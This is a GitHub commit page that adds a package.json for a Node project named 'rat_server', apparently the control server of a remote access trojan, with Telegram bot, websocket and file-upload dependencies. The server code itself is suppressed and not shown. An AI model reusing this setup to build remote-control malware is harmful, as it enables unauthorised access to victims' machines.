ARCHIVE OLD VERSION

This commit is contained in:
shiva yadav 2022-08-27 12:57:41 -07:00 committed by GitHub
parent 767935f57c
commit c8b50f771e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,24 @@
{
"name": "rat_server",
"version": "1.0.0",
"description": "",
"main": "index.js",
"engines": {
"node": "16.13.2"
},
"scripts": {
"start": "node server.js"
},
"keywords": [],
"author": "l",
"license": "ISC",
"dependencies": {
"body-parser": "^1.19.1",
"express": "latest",
"multer": "^1.4.4",
"node-telegram-bot-api": "latest",
"uuid": "^8.3.2",
"ws": "latest",
"axios": "^0.26.1"
}
}

14
OLD SERVER CODE/server.js Normal file

File diff suppressed because one or more lines are too long